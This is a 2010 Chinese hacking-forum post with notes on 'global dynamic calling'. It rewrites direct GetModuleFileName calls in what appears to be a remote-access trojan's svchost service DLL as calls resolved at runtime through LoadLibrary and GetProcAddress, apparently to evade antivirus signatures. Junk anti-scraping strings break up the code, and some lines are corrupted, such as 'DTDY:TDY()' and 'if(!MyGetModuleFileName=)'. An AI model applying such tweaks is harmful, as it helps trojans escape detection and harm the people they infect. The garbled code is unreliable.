标题:
[原创文章]
全局动态调用
[打印本页]
作者:
ice_xke
时间:
2010-10-19 12:30
标题:
全局动态调用
全局动态调用笔记
' J6 U( n+ r+ B
svchost files工程->插入->类(Generic Class DTDY)->DTDY.cpp DTDY.h
$ |4 p' A7 F1 e( Y/ S: q
----------------------------------------
1 m9 y3 o: x7 `2 K/ Y* M
DTDY.h:
6 b3 g& F+ M: t$ v0 t+ P
% r! Q" `8 ]5 S, p9 O. h1 T
#if _MSC_VER>1000
5 t- n2 o! l; f$ I c( u) c! L, |
#pragma once
5 p/ X8 S" D7 n0 w, E
#endif //_MSC_VER>1000
1 q! m3 L, [6 Y' U
#include<windows.h>
. v$ b. g, C, A! {2 c
, T! G, H& T% x% y3 {
typedef DWORD (__stdcall *pGetModuleFileNameA)(HMODULE,LPSTR,DWORD);
- A: x6 g6 j) i! J7 @: x& ~' }
class DTDY
5 u$ {: V( S. T
{
8 S c2 n$ j" H& M8 b, R" j5 f; ]
public:
/ _2 \7 d- w% d/ G# F( C1 Z6 c
DTDY();
: W( u7 U0 Z* J
virtual ~DTDY();
( ?; r3 Z) @1 d6 N/ F& N
public:
" C* @6 r' w# S. r* ^* C
static pGetModuleFileNameA MyGetModuleFileName;
! y, R( h: Q M7 g3 e; {
static BOOL FunInitiallization();
5 g9 K; U5 g, K' n7 I2 C( P
};
8 E& g1 o- h8 B& j8 ]! L. I3 c8 R
#endif
- i( Q: I( }5 p u) [* L1 ^
----------------------------------------
8 N( X L' e3 ^; D0 G% H% f
6 j& Q- j: v. a
DTDY.cpp:
3 [) H" m: w! _# x. T7 D
$ e4 \/ J1 f% L0 E ^2 A8 |
#include "DTDY.h"
" E+ O9 X( Z) T1 M; h
pGetModuleFileNameA DTDY::MyGetModuleFileName=NULL;
5 O& Z/ P* |- U
DTDY:TDY()
. E) M) J' z, h# F3 P2 _
{
: z X. |8 m5 M& [8 K' @- p; c0 I
}
& f' O" I) b+ u0 _- t
DTDY::~DTDY()
. N" a( N$ X1 e$ N+ f
{
- f6 R5 k+ F' H+ s- y0 E4 h
}
9 V d' G1 `: n
BOOL DTDY::FunInitiallization()
8 l5 ~+ H; _1 d& J4 E
{
) u) n) A6 n5 A1 P: R% z* u
HMODULE hModule=LoadLibrary("kernel32.dll");
1 E& v3 J# c7 Q* U
MyGetModuleFileName=(pGetModuleFileNameA)GetProcAddress(hModule,"GetModuleFileNameA");
, C- A3 r0 Y4 x+ ]8 h1 [# ~6 I
if(!MyGetModuleFileName=) return FALSE;
+ p6 F9 K7 d# p: X' c
0 z& c6 B+ c/ G, q& d* K3 Z8 @
return TRUE;
0 f. K% t8 [0 N$ P" c6 P, x
}
+ ~* a3 T; p6 d1 O* T6 h
----------------------------------------
: b7 X6 P3 z4 z" g
svchost.cpp:
# j. q7 G( F; w- |' l
/ p# \# T+ E: C/ K
#include "DTDY.h"
- e: ^' z: {: l# E) }1 s- S
% Q* t& k7 @6 q, v) l) }! i4 Z
BOOL APIENTRY DllMain(HANDLE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)
3 K' T' l# ~* t( |! `. H" N$ j9 q
{
& A* L* ]) K. F W4 s
switch(ul_reason_for_call)
$ \! n9 x4 z( i: b( R6 X9 n
{
8 Q- n1 q8 t: p5 t
case DLL_PROCESS_ATTACH:
+ ?( _& v* E- B9 A: i2 _; P
if(!DTDY::FunInitiallization()) return FALSE;
! ], J3 l+ W% Y) R
) D i6 g/ O2 \+ `
break;
$ L2 H# g. p" O6 h
}
M. X8 p4 t9 z$ f& X6 p
}
2 Q9 @" F2 U- ~! a. J
; _; C) t: {+ u t
3 @" D& _4 L7 k' A2 [0 K
GetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));->goto def
) i5 K6 F) b. k. w3 X3 A; ]1 {( P
改写为
3 D3 X0 z6 x7 {" a
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));
; [; R/ Q; I8 W4 C" y- z9 p
----------------------------------------
. l' p8 Q' ?# _0 G$ f% A5 B
KernelManager.cpp:
; b4 z/ k A" y3 m( A) I1 |4 f3 Q7 p$ d
3 u+ N8 j* F3 J1 u
#include "../DTDY.h"
+ m* U7 Z# ?% e7 @% Z+ h% ?
GetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
( b1 i: m) C; ?& T/ J$ @$ F
改写为
% e7 J6 ^8 F1 c# q0 y! ]
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
( Q8 {/ I# F9 h1 ]
----------------------------------------
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/)
Powered by Discuz! 7.2
